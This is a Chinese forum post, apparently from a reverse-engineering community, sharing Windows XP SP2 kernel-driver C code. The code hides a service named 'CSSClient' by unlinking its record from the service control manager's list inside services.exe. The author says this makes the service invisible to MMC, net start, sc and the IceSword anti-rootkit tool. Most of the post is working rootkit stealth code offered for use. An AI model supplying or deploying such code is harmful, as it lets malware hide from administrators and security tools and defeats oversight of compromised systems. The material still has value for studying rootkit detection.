高手飘过，我只是做一下苦力活把高手的分析写了一遍，共享出来大家用

EnumServicesStatus等API最终都是历遍SCM内部的ServiceRecordList，这是一个双向链表，在Services.exe进程创建时，由SvcCtrlMain -> ScInitDatabase -> ScGenerateServiceDB 产生。具体位置可从services!ServiceDatabase+0x4获得。
将需要隐藏的服务从链表上断开后，不管是MMC、net start或者SC，甚至IceSword，统统废掉了。
在xp2中编译通过可用
代码开始：
typedef struct _SERVICE_STATUS
{
        ULONG   dwServiceType;
        ULONG   dwCurrentState;
        ULONG   dwControlsAccepted;
        ULONG   dwWin32ExitCode;
        ULONG   dwServiceSpecificExitCode;
        ULONG   dwCheckPoint;
        ULONG   dwWaitHint;
} SERVICE_STATUS, *LPSERVICE_STATUS;

typedef struct _SERVICE_RECORD
{
        struct _SERVICE_RECORD *Prev; // linked list
        struct _SERVICE_RECORD *Next; // linked list
        LPWSTR ServiceName; // points to service name
        LPWSTR DisplayName; // points to display name
        ULONG ResumeNum; // Ordered number for this rec
        ULONG ServerAnnounce; // Server announcement bit flags
        ULONG Signature; // Identifies this as a service record.
        ULONG UseCount; // How many open handles to service
        ULONG StatusFlag; // status(delete,update...)
        union {
                //LPIMAGE_RECORD ImageRecord; // Points to image record
                void*        ImageRecord;
                LPWSTR ObjectName; // Points to driver object name
        };
        SERVICE_STATUS ServiceStatus; // see winsvc.h
        ULONG StartType; // AUTO, DEMAND, etc.
        ULONG ErrorControl; // NORMAL, SEVERE, etc.
        ULONG Tag; // DWORD Id for the service,0=none.
        //LPDEPEND_RECORD StartDepend;
        //LPDEPEND_RECORD StopDepend;
        void*        StartDepend;
        void*        StopDepend;
        LPWSTR Dependencies;
        PSECURITY_DESCRIPTOR ServiceSd;
        ULONG StartError;
        ULONG StartState;
        //LPLOAD_ORDER_GROUP MemberOfGroup;
        //LPLOAD_ORDER_GROUP RegistryGroup;
        void*        MemberOfGroup;
        void*        RegistryGroup;
} SERVICE_RECORD, *PSERVICE_RECORD, *LPSERVICE_RECORD;

#pragma PAGEDCODE
ULONG GetTargetProcess()
{
        ULONG                eproc = (ULONG)PsGetCurrentProcess();
        PLIST_ENTRY        pListEntry = (PLIST_ENTRY)(eproc + 0x88);
        PLIST_ENTRY pNextList = pListEntry->Flink;
        char *szPrcName = NULL;
        while(1)
        {
                eproc = *(ULONG*)((ULONG)pNextList);
                eproc = eproc - 0x88;
                szPrcName = (char*)(eproc+ 0x174);
                if( strcmp(szPrcName,"services.exe") == 0 )
                {
                        return eproc;

                }
                pNextList = pNextList->Flink;
        }

}

void HideService()
{
        int i = 0;
        ULONG uServiceDatabase = 0;
        KIRQL  oldIrql;
        PEPROCESS eproc = (PEPROCESS)GetTargetProcess();
        KeAttachProcess(eproc);
        //首先得到模块的基址
        ULONG uModuleBase = *(ULONG*)((ULONG)eproc + 0x13c);
        unsigned char *pStart = (unsigned char *)uModuleBase;
        PSERVICE_RECORD pstuSR = NULL;
        PSERVICE_RECORD pstuTempPre = NULL;
        PSERVICE_RECORD pstuTempNext = NULL;
        __try        //由于使用了KeAttachProcess，所以一定要用异常结构
        {
               
                ProbeForRead((void*)uModuleBase,10,1);//首先试下是否可读
                      //在ScCreateServiceRecord函数中找到ServiceDatabase
                for(i = 0; i < 107520; i++)
                {
                        if( pStart[i]     == 0x8b &&
                                pStart[i+159] == 0xb8 &&
                                pStart[i+164] == 0x5f)
                        {
                                uServiceDatabase = *(ULONG*)&pStart[i+160];
                                break;
                        }
                }
               
                pstuSR = (PSERVICE_RECORD)(*(ULONG*)(uServiceDatabase+ 4));
                PSERVICE_RECORD pstuTemp = pstuSR;
                while(1)
                {
                        pstuSR = pstuSR->Next;
                       

                        if( _wcsicmp(pstuSR->ServiceName,L"CSSClient") == 0)
                        {
                                //断开链接
                                pstuTempPre = pstuSR->Prev;
                                pstuTempNext = pstuSR->Next;
                                                       
                                memcpy((void*)((ULONG)pstuTempPre+4),(void*)((ULONG)pstuSR+4),4);
                                memcpy((void*)pstuTempNext,(void*)pstuSR,4);
                                                               
                                RtlZeroMemory((void*)pstuSR,8);
                                break;
                        }
                       
                }

        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
                KeDetachProcess();
                return;
        }
        KeDetachProcess();
        return;
}

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！